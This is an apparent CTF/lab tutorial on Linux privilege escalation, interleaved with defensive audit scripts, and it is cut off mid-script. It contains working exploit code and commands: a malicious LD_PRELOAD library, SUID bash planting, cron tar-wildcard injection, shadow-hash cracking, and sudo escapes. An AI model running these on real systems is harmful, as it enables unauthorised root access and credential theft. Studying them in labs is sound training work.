Linux Privilege Escalation

This blog discusses the basic escalation techniques required to get elevated shells in your bug-bounty or CTF challenges, and along the way gives a little more clarity on some Linux topics and processes…

1. Initial Enumeration

1.1 Basic Enumeration

uname -a                   # Check kernel version
cat /etc/os-release        # Identify OS version
cat /proc/version          # Additional OS info

1.2 User Enumeration

whoami                     # Current user
id                         # UID, GID and group memberships
sudo -l                    # Commands this particular user may run via sudo
cat /etc/passwd            # Lists the accounts on the system

cat /etc/passwd | cut -d : -f 1   # Usernames only, for a much more refined output

cat /etc/shadow: This file holds the password hashes for the respective users on the machine; normally only root can read it.
cat /etc/group: The /etc/group text file defines the groups to which users belong under the Linux and UNIX operating systems.

history: shows the whole bash history

1.3 Network Enumeration

ip a                       # Interfaces and addresses
ip route                   # Routing table
ip neigh                   # Neighbour (ARP) table
netstat -ano               # Listening sockets and established connections

1.4 Password Enumeration

  • grep --color=always -rnw / -ie "PASSWORD" 2> /dev/null
    -r = recurse into directories, -n = print line numbers, -w = whole word, -i = ignore case, -e = the term to search for
  • This command searches every readable file for the word password and prints each match highlighted in red

locate password | more : lists files whose name or path contains "password"

find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;

2. Privilege Escalation – Kernel Exploits

2.1 Dirty Cow Vulnerability

Dirty COW was a vulnerability in the Linux kernel. It allowed processes to write to read-only files. This exploit made use of a race condition that lived inside the kernel functions which handle the copy-on-write (COW) feature of memory mappings.

Code to replicate the vulnerability

For Detailed Explanation:
Dirty Cow Demo (toronto.edu)

TryHackMe

Detection

Linux VM

1. In command prompt type:

/home/user/tools/linux-exploit-suggester/linux-exploit-suggester.sh

2. From the output, notice that the OS is vulnerable to “dirty cow”.

Exploitation

Linux VM

1. In command prompt type:

gcc -pthread /home/user/tools/dirtycow/c0w.c -o c0w

2. In command prompt type: ./c0w

Disclaimer: This part takes 1-2 minutes – Please allow it some time to work.

3. In command prompt type: passwd

4. In command prompt type: id

From here, either copy /tmp/passwd back to /usr/bin/passwd or reset your machine to undo changes made to the passwd binary

2.2 Weak File Permissions

Normally a regular user can read the /etc/passwd file but not the /etc/shadow file.

So, if we come across an /etc/shadow that is readable by a regular user, we can use it to recover the password of the administrator/root user and get an elevated shell.

On the lab machine we have read access to /etc/shadow, so we can do the following:

  • cat /etc/passwd
    Observe all the users. The ‘x’ in the second field is a placeholder: the real password hash of that user lives in /etc/shadow.
  • cat /etc/shadow
    In the shadow file each user has a long hash. That hash is the hashed password of the user, so if we crack the root hash and recover the password we can log in and get root privileges.
  1. Copy all the contents of /etc/passwd into a new file and name it passwd.
  2. Copy all the contents of /etc/shadow into a new file named shadow, deleting the users without a hash so that only users with a hash remain.
  3. Run the tool unshadow on the two files; it replaces the ‘x’ placeholder in the passwd file with the hash from the shadow file.
  4. Copy the users with a hash into a new file and save it as creds.txt.
  5. Look up the hash type in the hashcat hash-types table: a hash whose initial characters are $6$ is sha512crypt, which is hashcat mode 1800.
  6. On Windows, install hashcat.exe and run the following:
  • hashcat64.exe -m 1800 creds.txt rockyou.txt -O
    -O = use the optimized kernels
    -m = hash mode
This cracks the password from the hash.

The password is “password123”.

TryHackMe

Detection

Linux VM

1. In command prompt type:

ls -la /etc/shadow

2. Note the file permissions

Exploitation

Linux VM

1. In command prompt type: cat /etc/passwd

2. Save the output to a file on your attacker machine

3. In command prompt type: cat /etc/shadow

4. Save the output to a file on your attacker machine

Attacker VM

1. In command prompt type: unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt

Now, you have an unshadowed file.  We already know the password, but you can use your favorite hash cracking tool to crack dem hashes.  For example:

hashcat -m 1800 unshadowed.txt rockyou.txt -O
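The checks in this section can be turned into a small audit; the following is an added example, not code from the original post. It flags passwd entries with UID 0 other than root, entries whose password field is empty or holds a hash instead of the x placeholder, empty hashes in shadow, and a shadow mode that lets non-root users read the hashes; the sample files are constructed inline and the hashes in them are not real.

```shell
# audit_accounts PASSWD SHADOW: print one finding per line (added example).
audit_accounts() {
  awk -F: '
    NF < 7 { next }                                       # skip malformed lines
    $3 == 0 && $1 != "root"    { print "UID0:" $1 }       # extra superuser account
    $2 == ""                   { print "NOPASS:" $1 }     # empty field: login without password
    $2 != "" && $2 !~ /^[x*!]/ { print "HASH-IN-PASSWD:" $1 }  # hash kept in world-readable passwd
  ' "$1"
  mode=$(stat -c '%a' "$2" 2>/dev/null)
  case "$mode" in
    "" | 000 | 400 | 600 | 640) ;;                        # root (or root:shadow) only
    *) printf 'SHADOW-MODE:%s\n' "$mode" ;;               # others can read the hashes
  esac
  awk -F: 'NF >= 2 && $2 == "" { print "SHADOW-NOPASS:" $1 }' "$2" 2>/dev/null
  return 0
}

# demo_audit: constructed sample files in a temp dir (not real system files,
# not real hashes); returns the findings for them.
demo_audit() {
  d=$(mktemp -d)
  cat > "$d/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
user:x:1000:1000::/home/user:/bin/bash
backup:$6$salt$FAKEHASH:1001:1001::/home/backup:/bin/sh
admin2:x:0:0::/root:/bin/bash
guest::1002:1002::/home/guest:/bin/sh
EOF
  cat > "$d/shadow" <<'EOF'
root:$6$salt$FAKEHASH:19000:0:99999:7:::
user:$6$salt$FAKEHASH2:19000:0:99999:7:::
guest::19000:0:99999:7:::
EOF
  chmod 644 "$d/shadow"          # the weak permission the lab relies on
  audit_accounts "$d/passwd" "$d/shadow"
  rm -rf "$d"
}

demo_audit
```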

2.3 Escalation via SSH Keys

  • What is an authorized key?

SSH authenticates a user with a key pair: the public key is stored on the server in the user’s authorized_keys file, and the private key stays with the user on the client side.

  • What is id_rsa?

id_rsa is the default file name of an SSH (RSA) private key.

In order to find those authorized_keys and id_rsa files 👇

  • find / -name authorized_keys 2> /dev/null
  • find / -name id_rsa 2> /dev/null

If we find a readable id_rsa file on the system, open it, copy the private key into a file on our own Linux machine, open a new tab in our own terminal and then:

  • gedit id_rsa
    chmod 600 id_rsa
    ssh -i id_rsa root@<ip> (IP address of the target machine)

TryHackMe

Detection

Linux VM

1. In command prompt type:

find / -name authorized_keys 2> /dev/null

2. In a command prompt type:

find / -name id_rsa 2> /dev/null

3. Note the results.

Exploitation

Linux VM

1. Copy the contents of the discovered id_rsa file to a file on your attacker VM.

Attacker VM

1. In command prompt type: chmod 400 id_rsa

2. In command prompt type: ssh -i id_rsa root@<ip>

You should now have a root shell 🙂
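The find commands above locate key files by name; the following added example (not from the original post) instead looks for files that carry a private-key header and reports those whose mode grants group or other access, which is the condition that let the key be read here. The key files in the demo are constructed placeholders, not real keys.

```shell
# find_exposed_keys DIR: print "MODE PATH" for each private-key file under DIR
# that group or others can access (added example).
find_exposed_keys() {
  find "$1" -type f -size -64k 2>/dev/null | while IFS= read -r f; do
    # only files that carry a PEM/OpenSSH private-key header
    head -n 1 "$f" 2>/dev/null | grep -q 'PRIVATE KEY-----' || continue
    mode=$(stat -c '%a' "$f")
    case "$mode" in
      *00) ;;                                    # 600, 400, 700: owner only
      *)   printf '%s %s\n' "$mode" "$f" ;;      # some group/other bit is set
    esac
  done
  return 0
}

# demo_keys: constructed fake key files in a temp dir; paths are printed
# relative to that dir. The key bodies are placeholders, not real keys.
demo_keys() {
  d=$(mktemp -d)
  mkdir -p "$d/.ssh" "$d/backup"
  for f in .ssh/id_rsa backup/id_rsa.old; do
    printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' \
      'CONSTRUCTED-PLACEHOLDER' '-----END OPENSSH PRIVATE KEY-----' > "$d/$f"
  done
  printf 'not a key\n' > "$d/.ssh/config"
  chmod 600 "$d/.ssh/id_rsa"        # correct: owner only
  chmod 644 "$d/backup/id_rsa.old"  # exposed: world-readable copy of a key
  chmod 644 "$d/.ssh/config"        # readable, but not a key
  find_exposed_keys "$d" | sed "s|$d/||"
  rm -rf "$d"
}

demo_keys
```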

3. Escalation Path: Sudo

3.1 Sudo shell escaping

  • sudo -l
    This command lists all the commands the current user is allowed to run as root.
We can abuse the functionality of those commands to get a root shell.

Refer to GTFOBins for how each of those commands can be used to get privileged access to a system.

TryHackMe

Detection

Linux VM

1. In command prompt type: sudo -l

2. From the output, notice the list of programs that can run via sudo.

Exploitation

Linux VM

1. In command prompt type any of the following:

a. sudo find /bin -name nano -exec /bin/sh \;

b. sudo awk 'BEGIN {system("/bin/sh")}'

c. echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse

d. sudo vim -c '!sh'

3.2 Escalation via intended functionality

  • sudo apache2 -f /etc/shadow

Sometimes none of the commands we can run with sudo offers a shell escape; in that case, look at the intended functionality of the command itself.

For example, apache2 -f reads the given file as its configuration and reports the first line it cannot parse in an error message, so pointing it at /etc/shadow makes Apache print the root hash. Try this type of method while escalating…

TryHackMe

Detection

Linux VM

1. In command prompt type: sudo -l

2. From the output, notice the list of programs that can run via sudo.

Exploitation

Linux VM

1. In command prompt type:

sudo apache2 -f /etc/shadow

2. From the output, copy the root hash.

Attacker VM

1. Open command prompt and type:

echo '[Pasted Root Hash]' > hash.txt

2. In command prompt type:

john --wordlist=/usr/share/wordlists/nmap.lst hash.txt

3. From the output, notice the cracked credentials.

3.3 Escalation via LD_PRELOAD

What is LD_PRELOAD?

The LD_PRELOAD trick is a useful technique to influence the linkage of shared libraries and the resolution of symbols (functions) at runtime. To explain LD_PRELOAD, let’s first discuss a bit about libraries in the Linux system.

In brief, a library is a collection of compiled functions. We can make use of these functions in our programs without rewriting the same functionality. This can be achieved by either including the library code in our program (static library) or by linking dynamically at runtime (shared library).

Using static libraries, we can build standalone programs. On the other hand, programs built with a shared library require runtime linker/loader support. For this reason, before executing a program, all required symbols are loaded and the program is prepared for execution. (What Is the LD_PRELOAD Trick? | Baeldung on Linux)

We are going to make a malicious shared library and preload it.
Type the code below and save it as shell.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid, setgid */

/* With -nostartfiles, _init is the library's initializer: it runs as soon as the library is loaded */
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

First, we unset the LD_PRELOAD environment variable so that the programs we spawn from here do not try to preload the library again and end up in a loop. Then we set the gid and uid to ‘0’, i.e. root.
Finally, we tell the system to run “/bin/bash”.
This “/bin/bash” is executed before the target program’s own code: the loader maps a preloaded shared library first and runs its initializer (_init) before the program’s main.

After typing the code into nano, press Ctrl+X and then Y to save.
Next, type the following:

  • gcc -fPIC -shared -o shell.so shell.c -nostartfiles
    -fPIC = position-independent code, so the library works wherever it is mapped in memory.
    -shared = compile our C code into a shared library.
    -nostartfiles = skip the default startup files, so our _init is the library’s initializer.
  • ls
    To check whether shell.so was produced.
  • sudo LD_PRELOAD=/home/user/shell.so apache2
    /home/user/shell.so = full path of the library file.
    apache2 = anything that can run as sudo; type sudo -l and pick something from the list.
    This works because sudoers keeps the LD_PRELOAD variable (env_keep): the loader maps the malicious library (shell.so) into the apache2 process and runs our _init as root, so “/bin/bash” is executed before the desired command (apache2).

TryHackMe

Detection

Linux VM

1. In the command prompt type: sudo -l

2. From the output, notice that the LD_PRELOAD environment variable is intact.

Exploitation

1. Open a text editor and type:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid, setgid */

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

2. Save the file as x.c

3. In command prompt type:

gcc -fPIC -shared -o /tmp/x.so x.c -nostartfiles

4. In the command prompt type:

sudo LD_PRELOAD=/tmp/x.so apache2

5. In command prompt type: id

3.4 CVE-2019-14287: sudo vulnerability allows bypass of user restrictions

  • This vulnerability lets a user run commands as root even though the sudoers rule explicitly denies running them as root.
  • Exploiting it requires the user to have a sudo rule that allows running commands as an arbitrary user ID except root, e.g. (ALL, !root).
  • sudo -u#-1 /bin/bash
    sudo treated the user ID -1 (4294967295) as 0, i.e. root, so the “!root” exclusion did not apply.
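The two sudo escalations above (3.3 and 3.4) both depend on sudoers settings, so the following added example (not from the original post) audits a sudoers file for them: env_keep of loader variables or a SETENV tag, which let LD_PRELOAD reach a sudo-run program, and a runas list that excludes root, which is the pattern CVE-2019-14287 bypassed on sudo older than 1.8.28. It assumes the sudoers text and the first line of sudo -V are available as input; the sample is constructed to mirror the lab.

```shell
# audit_sudoers FILE: print one finding per risky sudoers line (added example).
audit_sudoers() {
  awk '
    /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
    /^Defaults/ && /env_keep/ && /LD_PRELOAD|LD_LIBRARY_PATH/ { print "ENV_KEEP-LOADER-VAR: " $0 }
    /^Defaults/ && /!env_reset/          { print "ENV_RESET-DISABLED: " $0 }
    /SETENV:/                            { print "SETENV-TAG: " $0 }
    /\([^)]*![[:space:]]*root[^)]*\)/    { print "RUNAS-EXCLUDES-ROOT: " $0 }
  ' "$1"
  return 0
}

# sudo_vulnerable_14287 "Sudo version X": succeed (0) when X is below 1.8.28,
# the release that fixed CVE-2019-14287; 1 otherwise, 2 if no version found.
sudo_vulnerable_14287() {
  v=$(printf '%s\n' "$1" | sed -n 's/^Sudo version \([0-9][0-9.p]*\).*/\1/p')
  [ -n "$v" ] || return 2
  [ "$v" != "1.8.28" ] || return 1
  # sort -V orders version strings; ours sorting first means it is older
  [ "$(printf '%s\n%s\n' "$v" 1.8.28 | sort -V | head -n 1)" = "$v" ]
}

# demo_sudoers: constructed sudoers text modelled on the lab machine.
demo_sudoers() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
Defaults        env_reset
Defaults        env_keep += "LD_PRELOAD"
root    ALL=(ALL:ALL) ALL
user    ALL=(ALL, !root) /bin/bash
user    ALL=(root) NOPASSWD: /usr/sbin/apache2
deploy  ALL=(root) SETENV: /usr/local/bin/deploy.sh
EOF
  audit_sudoers "$f"
  rm -f "$f"
}

demo_sudoers
```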

4. SUID Overview and Escalation

What is SUID?

SUID stands for Set owner User ID. It is a special permission bit on executable files: when a file with the SUID bit set is run, the process’s effective UID becomes that of the file’s owner instead of that of the user running it.

The SUID bit shows up in a listing like this:

  • rwsr-sr-x 1 root root 30768 Dec 7 2021 /usr/bin/passwd
  • In order to find these SUID files we can run the following command:
  • find / -perm -u=s -type f 2> /dev/null
    -perm -u=s = files with the set-user-ID bit
    -type f = regular files only
This is how we can see that a file has the SUID permission (the ‘s’ in the owner’s execute position of the first field).

4.1 Escalation via shared object injection

  • find / -type f -perm -04000 -ls 2> /dev/null
  • Here observe the binary /usr/local/bin/suid-so; ‘so’ means shared object. We are going to run it under strace to see what it does in the background.
  • strace /usr/local/bin/suid-so 2>&1
    strace is a diagnostic, debugging and instructional user-space utility for Linux.
    It is used to monitor and tamper with interactions between processes and the Linux kernel, which include system calls, signal deliveries, and changes of process state.
  • strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
  • The binary tries to load libcalc.so from a directory we can write to, and the file does not exist there. So we place a malicious libcalc.so at that path: when we run /usr/local/bin/suid-so it looks for “libcalc.so”, finds ours, and our code is executed.
#include <stdio.h>
#include <stdlib.h>

/* constructor attribute: the function runs automatically when the library is loaded */
static void inject() __attribute__((constructor));

void inject() {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
  • We copy /bin/bash to /tmp/bash, give it the +s (SUID) permission and execute /tmp/bash with -p so that it keeps the elevated privileges.
  • mkdir /home/user/.config
  • gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/.config/libcalc.c
  • /usr/local/bin/suid-so

TryHackMe

Detection

Linux VM

1. In command prompt type: find / -type f -perm -04000 -ls 2>/dev/null

2. From the output, make note of all the SUID binaries.

3. In command line type:

strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"

4. From the output, notice that a .so file is missing from a writable directory.

Exploitation

Linux VM

5. In command prompt type: mkdir /home/user/.config

6. In command prompt type: cd /home/user/.config

7. Open a text editor and type:

#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

8. Save the file as libcalc.c

9. In command prompt type:

gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c

10. In command prompt type: /usr/local/bin/suid-so

11. In command prompt type: id
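The strace-and-grep step above is done by eye; the following added example (not from the original post) automates the check for a saved strace log: it extracts every shared object the binary failed to open and reports those whose directory is writable by the current user, or does not exist under a writable parent, which is the /home/user/.config situation in the lab. The strace lines are constructed, with a temp directory standing in for /home/user.

```shell
# missing_libs_in_writable_dirs TRACE: print missing .so files a SUID binary
# looked for in places the current user could plant one (added example).
missing_libs_in_writable_dirs() {
  # paths from failed open()/openat()/access() calls on a *.so* file
  sed -nE 's/^(open|openat|access)\([^"]*"([^"]*\.so[^"]*)".*ENOENT.*/\2/p' "$1" |
  sort -u |
  while IFS= read -r lib; do
    dir=$(dirname "$lib")
    if [ -d "$dir" ]; then
      [ -w "$dir" ] && printf 'WRITABLE-DIR %s\n' "$lib"
    elif [ -w "$(dirname "$dir")" ]; then
      printf 'CREATABLE-DIR %s\n' "$lib"      # mkdir + drop the file, as in the lab
    fi
  done
  return 0
}

# demo_trace: constructed strace output against a temp dir that stands in for
# /home/user; output paths are printed relative to it.
demo_trace() {
  d=$(mktemp -d)
  mkdir "$d/writable"
  cat > "$d/trace.txt" <<EOF
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
open("$d/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
open("$d/writable/libw.so", O_RDONLY) = -1 ENOENT (No such file or directory)
open("$d/nonexist/deeper/libx.so", O_RDONLY) = -1 ENOENT (No such file or directory)
EOF
  missing_libs_in_writable_dirs "$d/trace.txt" | sed "s|$d/||"
  rm -rf "$d"
}

demo_trace
```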

4.2 Escalation via binary symlinks

In order for this vulnerability to work, some conditions have to be met.

  1. A vulnerable version of the Nginx server is required.
  2. The SUID bit must be set on sudo.
  • First run an exploit-suggester tool to check the version of Nginx, or type the following command: dpkg -l | grep nginx
  • Now run this line to check the SUID binaries on the machine: find / -type f -perm -04000 -ls 2>/dev/null

Once both conditions are satisfied, we can look at the permissions on the Nginx log files:

  • ls -la /var/log/nginx
We can see that www-data has read, write and execute (rwx) permission on the log directory.

Because www-data can write to the log directory, we can use a symlink to replace the log file with a link to a file of our choosing.

What is a symlink?
A symlink (symbolic link) is a file that contains a reference to another file or directory in the form of an absolute or relative path. We are going to create a malicious symlink in place of the error.log file.

  • The only other condition here is that the Nginx log rotation has to run (in the lab we trigger it manually) to get the elevated shell.

Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247 (legalhackers.com)

  • Download the script from the above site and run it, pointing it at the log file: ./nginx-root.sh /var/log/nginx/error.log
  • It creates the symlink; all we need to do now is wait for the log rotation and we get prompted into an elevated shell (in the lab we trigger the rotation ourselves only to save time).
  • To trigger the rotation, as root type: invoke-rc.d nginx rotate > /dev/null 2>&1

TryHackMe

Detection

Linux VM

1. In command prompt type: dpkg -l | grep nginx

2. From the output, notice that the installed nginx version is below 1.6.2-5+deb8u3.

Exploitation

Linux VM – Terminal 1

1. For this exploit, it is required that the user be www-data. To simulate this escalate to root by typing: su root

2. The root password is password123

3. Once escalated to root, in command prompt type: su -l www-data

4. In command prompt type: /home/user/tools/nginx/nginxed-root.sh /var/log/nginx/error.log

5. At this stage, the system waits for logrotate to execute. In order to speed up the process, this will be simulated by connecting to the Linux VM via a different terminal.

Linux VM – Terminal 2

1. Once logged in, type: su root

2. The root password is password123

3. As root, type the following: invoke-rc.d nginx rotate >/dev/null 2>&1

4. Switch back to the previous terminal.

Linux VM – Terminal 1

1. From the output, notice that the exploit continued its execution.

2. In command prompt type: id

4.3 Escalation via Environment Variables

What is an environment variable?
An environment variable is a variable whose value is set outside the program, typically through functionality built into the operating system or microservice.

To list the environment variables in your session run env

Lab developed by Heath Adams
  • find / -type f -perm -4000 -ls 2>/dev/null
  • The binaries suid-env and suid-env2 in the output were made specially to demonstrate this exploit.
  • Run strings /usr/local/bin/suid-env; this prints the readable strings inside the binary.
  • In the last line we can see “service apache2 start”: the binary calls the service command to start the Apache server.
  • Let’s look at the PATH variable by typing echo $PATH
  • The path is /usr/local/bin
  • What is happening here: the binary calls service by its bare name, so the shell searches the directories listed in PATH, in order, for an executable named service and runs the first one it finds. PATH is an environment variable, and that is how the service command gets located and called.
  • What if we put a directory we control first in PATH and place a malicious file named service there, to get a root shell?
  • C one-liner: echo 'int main(){ setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
  • Compile the above code: gcc /tmp/service.c -o /tmp/service
  • We now have the malicious service sitting in /tmp/
    Next we change PATH, which is the environment variable the lookup uses: export PATH=/tmp:$PATH
  • Now if we echo $PATH we can see /tmp listed first.
  • We now run /usr/local/bin/suid-env and get a root shell.

4.3.1 SUID (Environment Variables #1)

Detection

Linux VM

1. In command prompt type: find / -type f -perm -04000 -ls 2>/dev/null

2. From the output, make note of all the SUID binaries.

3. In command prompt type: strings /usr/local/bin/suid-env

4. From the output, notice the functions used by the binary.

Exploitation

Linux VM

1. In command prompt type:

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c

2. In command prompt type: gcc /tmp/service.c -o /tmp/service

3. In command prompt type: export PATH=/tmp:$PATH

4. In command prompt type: /usr/local/bin/suid-env

5. In command prompt type: id

4.3.2 SUID (Environment Variables #2)

Detection

Linux VM

1. In command prompt type: find / -type f -perm -04000 -ls 2>/dev/null

2. From the output, make note of all the SUID binaries.

3. In command prompt type: strings /usr/local/bin/suid-env2

4. From the output, notice the functions used by the binary.

Exploitation Method #1

Linux VM

1. In command prompt type:

function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }

2. In command prompt type:

export -f /usr/sbin/service

3. In command prompt type: /usr/local/bin/suid-env2

Exploitation Method #2

Linux VM

1. In command prompt type:

env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'

5. Capabilities

  • Capabilities split the privileges of root into separate units that can be granted to a binary individually; they are finer-grained than SUID and are used on modern kernels.
  • The command to list the capabilities set on files in our system is getcap -r / 2>/dev/null
  • You will see binaries with a capability ending in “+ep”: the capability is in the permitted and effective sets, so for our purposes assume the binary is allowed to use it.
  • /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")': by executing this we get an elevated shell, because python2.6 holds cap_setuid.

TryHackMe

Detection

Linux VM

1. In command prompt type: getcap -r / 2>/dev/null

2. From the output, notice the value of the “cap_setuid” capability.

Exploitation

Linux VM

1. In command prompt type:

/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'

2. Enjoy root!
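Reading getcap output by hand gets tedious on a real box, so the following added example (not from the original post) parses a saved getcap -r listing and reports binaries holding a capability that can yield root or bypass file permissions, in both the older "path = cap+flags" and the newer "path cap=flags" output styles. The listing is constructed; the python2.6 line mirrors the lab.

```shell
# audit_caps FILE: print "DANGEROUS PATH CAP" for each risky file capability
# that is in the permitted set (added example).
audit_caps() {
  awk '
    BEGIN {
      n = split("cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown cap_fowner cap_setfcap", d, " ")
      for (i = 1; i <= n; i++) danger[d[i]] = 1
    }
    NF == 0 { next }
    {
      path = $1
      caps = ($2 == "=") ? $3 : $2          # old style has a bare "=" as field 2
      # caps look like cap_a,cap_b+ep or cap_a,cap_b=eip: names, then flag letters
      split(caps, kv, /[+=]/)
      if (kv[2] !~ /p/) next                # not permitted, so the binary cannot use it
      m = split(kv[1], names, ",")
      for (j = 1; j <= m; j++)
        if (names[j] in danger) print "DANGEROUS " path " " names[j]
    }' "$1"
  return 0
}

# demo_caps: constructed getcap output; the python2.6 line mirrors the lab.
demo_caps() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.6 = cap_setuid+ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
/opt/tool cap_dac_override,cap_net_bind_service=ep
/opt/inherit cap_setgid+i
EOF
  audit_caps "$f"
  rm -f "$f"
}

demo_caps
```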

6. Escalation via PATH in Scheduled Tasks

Usually works with cron jobs and systemctl

  1. What is a cron job?
    Cron jobs are used for scheduling tasks by executing commands at specific dates and times on the server. They’re most commonly used for sysadmin jobs such as backups or cleaning /tmp/ directories and so on.
  • To check which cron jobs are configured on our machine type cat /etc/crontab
  • In the output we can see the PATH line (searched left to right) and a job that runs overwrite.sh by its bare name.
  • Now try ls -la /home/user: there is no overwrite.sh file there, yet /home/user is the first directory in cron’s PATH. So why not create a malicious file with that name there and let cron execute it to get an elevated shell?
  • echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
  • chmod +x /home/user/overwrite.sh
  • Wait a minute, then run /tmp/bash -p and we get an elevated shell.

TryHackMe

Detection

Linux VM

1. In command prompt type: cat /etc/crontab

2. From the output, notice the value of the “PATH” variable.

Exploitation

Linux VM

1. In command prompt type:

echo ‘cp /bin/bash /tmp/bash; chmod +s /tmp/bash’ > /home/user/overwrite.sh

2. In command prompt type: chmod +x /home/user/overwrite.sh

3. Wait 1 minute for the Bash script to execute.

4. In command prompt type: /tmp/bash -p

5. In command prompt type: id

6.2 Escalation via cron wildcards

  • Look again at the output of cat /etc/crontab.
  • Here we can see the script /usr/local/bin/compress.sh
  • cat /usr/local/bin/compress.sh
#!/bin/sh
cd /home/user
tar czf /tmp/backup.tar.gz *

It runs a tar command that backs up everything in /home/user, using a wildcard (*). Because the shell expands the wildcard into the file names in that directory, a file whose name looks like a tar option is passed to tar as an option, so we can inject a malicious one:

  • echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
  • chmod +x /home/user/runme.sh
  • touch /home/user/--checkpoint=1
  • touch /home/user/--checkpoint-action=exec=sh\ runme.sh
  • The runme.sh file is picked up by the wildcard (*). The first touch creates a file named like the option --checkpoint=1, which tells tar to report a checkpoint after every record.
  • The second touch creates a file named like --checkpoint-action=exec=sh runme.sh, which tells tar to run sh runme.sh at each checkpoint.
  • /tmp/bash -p

To sum it up: when cron runs tar czf /tmp/backup.tar.gz * the wildcard expands to include --checkpoint=1 and --checkpoint-action=exec=sh runme.sh, so tar executes runme.sh,
which in turn runs cp /bin/bash /tmp/bash; chmod +s /tmp/bash

TryHackMe

Detection

Linux VM

1. In command prompt type: cat /etc/crontab

2. From the output, notice the script “/usr/local/bin/compress.sh”

3. In command prompt type: cat /usr/local/bin/compress.sh

4. From the output, notice the wildcard (*) used by ‘tar’.

Exploitation

Linux VM

1. In command prompt type:

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh

2. touch /home/user/--checkpoint=1

3. touch /home/user/--checkpoint-action=exec=sh\ runme.sh

4. Wait 1 minute for the Bash script to execute.

5. In command prompt type: /tmp/bash -p

6. In command prompt type: id

6.3 Escalation via Cron File Overwrite

Detection

Linux VM

1. In command prompt type: cat /etc/crontab

2. From the output, notice the script “overwrite.sh”

3. In command prompt type: ls -l /usr/local/bin/overwrite.sh

4. From the output, notice the file permissions.

Exploitation

Linux VM

1. In command prompt type:

echo ‘cp /bin/bash /tmp/bash; chmod +s /tmp/bash’ >> /usr/local/bin/overwrite.sh

2. Wait 1 minute for the Bash script to execute.

3. In command prompt type: /tmp/bash -p

4. In command prompt type: id
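Sections 6, 6.2 and 6.3 each inspect /etc/crontab by hand for a different weakness; the following added example (not from the original post) runs the three checks over a crontab file in one pass: a bare command name is reported as HIJACKABLE for every writable PATH directory searched before the one that holds it, a job script writable by the current user as WRITABLE-SCRIPT, and a tar run over a wildcard as WILDCARD-TAR. The crontab and scripts are constructed in a temp directory standing in for /home/user and /usr/local/bin, and writability is tested for whoever runs the audit.

```shell
# audit_crontab FILE: report the three cron weaknesses above (added example).
audit_crontab() {
  cron_path=$(sed -n 's/^PATH=//p' "$1" | tail -n 1)
  # job lines only: drop comments, blank lines and VAR=value settings
  grep -Ev '^[[:space:]]*(#|$)|^[A-Za-z_]+=' "$1" |
  while read -r min hour dom mon dow user cmd rest; do
    [ -n "$cmd" ] || continue
    resolved=""
    case "$cmd" in
      /*) resolved=$cmd ;;
      *)  # bare name: walk cron's PATH left to right, as the cron shell does
        search=$cron_path:
        while [ -n "$search" ]; do
          dir=${search%%:*}; search=${search#*:}
          [ -n "$dir" ] || continue
          if [ -e "$dir/$cmd" ]; then resolved=$dir/$cmd; break; fi
          # a writable directory searched before the real script wins the lookup
          [ -w "$dir" ] && printf 'HIJACKABLE %s via %s\n' "$cmd" "$dir"
        done ;;
    esac
    [ -n "$resolved" ] || continue
    [ -w "$resolved" ] && printf 'WRITABLE-SCRIPT %s\n' "$resolved"
    # tar over a shell wildcard takes file names as options (section 6.2)
    grep -Eq 'tar .*\*' "$resolved" 2>/dev/null && printf 'WILDCARD-TAR %s\n' "$resolved"
  done
  return 0
}

# demo_crontab: constructed crontab and scripts in a temp dir that stands in
# for the lab's /home/user and /usr/local/bin; paths print relative to it.
demo_crontab() {
  d=$(mktemp -d)
  mkdir "$d/home" "$d/bin"
  printf '#!/bin/sh\necho hi\n' > "$d/bin/overwrite.sh"
  printf '#!/bin/sh\ncd %s/home\ntar czf /tmp/backup.tar.gz *\n' "$d" > "$d/bin/compress.sh"
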